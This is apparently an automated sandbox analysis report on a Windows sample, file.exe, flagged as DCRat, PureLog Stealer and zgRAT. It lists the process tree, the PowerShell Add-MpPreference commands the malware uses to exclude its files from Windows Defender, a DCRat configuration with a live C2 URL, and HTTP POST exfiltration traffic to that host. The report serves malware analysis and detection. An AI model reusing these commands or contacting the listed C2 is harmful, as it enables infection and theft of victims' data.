Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1568390
MD5:	10f971c35d66a56bff28e89b8f97b849
SHA1:	f504ffe66a8bf9725af6c5aed8cb0358dfc460b1
SHA256:	8b73a27cf75cda6f4196d1b9491e90209c73171098c02ffc4753ae729fd557ec
Tags:	exeuser-Bitsight
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 10F971C35D66A56BFF28E89B8F97B849)

wscript.exe (PID: 7388 cmdline: "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7540 cmdline: C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chainportruntimeCrtMonitor.exe (PID: 7584 cmdline: "C:\MsContainer/chainportruntimeCrtMonitor.exe" MD5: A961FFE1FAEECF8AD553D4792052498C)

powershell.exe (PID: 7916 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7932 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7952 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7980 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7988 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1436 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2132 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5560 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

DtJTopEKFGnyRQt.exe (PID: 7708 cmdline: "C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe" MD5: A961FFE1FAEECF8AD553D4792052498C)

DtJTopEKFGnyRQt.exe (PID: 8188 cmdline: C:\Recovery\DtJTopEKFGnyRQt.exe MD5: A961FFE1FAEECF8AD553D4792052498C)

DtJTopEKFGnyRQt.exe (PID: 6412 cmdline: C:\Recovery\DtJTopEKFGnyRQt.exe MD5: A961FFE1FAEECF8AD553D4792052498C)

svchost.exe (PID: 3116 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
file.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Recovery\DtJTopEKFGnyRQt.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\DtJTopEKFGnyRQt.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\MsContainer\sppsvc.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\MsContainer\sppsvc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\MsContainer\sppsvc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\MsContainer\sppsvc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\MsContainer\chainportruntimeCrtMonitor.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\MsContainer\chainportruntimeCrtMonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000020.00000002.3386767298.0000000003700000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.2031269682.0000000004F16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000020.00000002.3386767298.00000000038CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.2031885965.000000000502A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000000.2150784593.00000000000C2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2234665352.00000000125F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7584	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: DtJTopEKFGnyRQt.exe PID: 8188	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.file.exe.50786fe.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.file.exe.50786fe.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.chainportruntimeCrtMonitor.exe.c0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.chainportruntimeCrtMonitor.exe.c0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.file.exe.4f646fe.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.file.exe.4f646fe.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.file.exe.4f646fe.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.file.exe.4f646fe.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\MsContainer\chainportruntimeCrtMonitor.exe, ProcessId: 7584, TargetFilename: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7584, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe', ProcessId: 7916, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe" , ProcessId: 7388, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7584, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe', ProcessId: 7916, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3116, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T15:45:50.875167+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49741	193.3.168.50	80	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T15:46:03.737025+0100	2048130	1	A Network Trojan was detected	192.168.2.5	49785	193.3.168.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\xcCqXurc.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\gRRDSLOb.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\MsContainer\sppsvc.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000005.00000002.2234665352.00000000125F0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	ReversingLabs: Detection: 55%
Source: C:\MsContainer\sppsvc.exe	ReversingLabs: Detection: 55%
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	ReversingLabs: Detection: 55%
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\AGJJGYBl.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\RzAxqjrs.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\YmAdlBZw.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\eyAdKmjt.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\gMOMTVsR.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\gRRDSLOb.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\oyuBnBbv.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\xcCqXurc.log	ReversingLabs: Detection: 50%
Source: C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe	ReversingLabs: Detection: 55%
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for dropped file

Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Joe Sandbox ML: detected
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Joe Sandbox ML: detected
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AGJJGYBl.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RzAxqjrs.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\YmAdlBZw.log	Joe Sandbox ML: detected
Source: C:\MsContainer\sppsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\oyuBnBbv.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_007BA69B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_007CC220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DB348 FindFirstFileExA,	0_2_007DB348

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 4x nop then jmp 00007FF848F41936h	32_2_00007FF848F4172E
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 4x nop then jmp 00007FF8494B0E19h	32_2_00007FF8494B0C28
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 4x nop then jmp 00007FF848F31936h	33_2_00007FF848F3172E
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Code function: 4x nop then jmp 00007FF848F41936h	42_2_00007FF848F3087A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49741 -> 193.3.168.50:80
Source: Network traffic	Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49785 -> 193.3.168.50:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI

Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1452Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ndVvQxCQKh641w1VNpwLb2irfBNeaHaU48User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 131294Expect: 100-continue
